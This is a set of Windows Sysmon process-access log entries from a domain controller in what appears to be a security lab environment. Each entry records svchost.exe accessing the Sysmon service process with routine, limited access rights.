{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
